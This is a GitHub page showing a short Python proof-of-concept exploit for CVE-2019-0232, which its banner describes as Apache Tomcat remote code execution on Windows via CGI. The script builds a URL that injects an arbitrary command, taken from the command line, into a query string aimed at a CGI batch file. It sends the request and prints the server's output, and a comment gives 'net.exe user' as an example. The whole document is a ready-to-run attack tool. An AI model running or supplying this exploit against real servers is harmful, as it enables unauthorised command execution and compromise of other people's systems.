forked from jas502n/CVE-2019-0232
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2019-0232.py
37 lines (21 loc) · 1.02 KB
/
CVE-2019-0232.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import requests
import sys
# http://localhost:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Cnet.exe+user
url = sys.argv[1]
url_dir = "/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5C"
cmd = sys.argv[2]
vuln_url = url + url_dir +cmd
print '''
_______ ________ ___ ___ __ ___ ___ ___ ____ ___
/ ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ / _ \__ \|___ \__ \
| | \ \ / /| |__ ______ ) | | | || | (_) |______| | | | ) | __) | ) |
| | \ \/ / | __|______/ /| | | || |\__, |______| | | |/ / |__ < / /
| |____ \ / | |____ / /_| |_| || | / / | |_| / /_ ___) / /_
\_____| \/ |______| |____|\___/ |_| /_/ \___/____|____/____|
Apache Tomcat Remote Code Execution on Windows - CGI-BIN
By Jas502n
'''
print "Usage: python CVE-2019-0232.py url cmd"
print "The Vuln url:\n\n" ,vuln_url
r = requests.get(vuln_url)
print "\nThe Vuln Response Content: \n\n" , r.content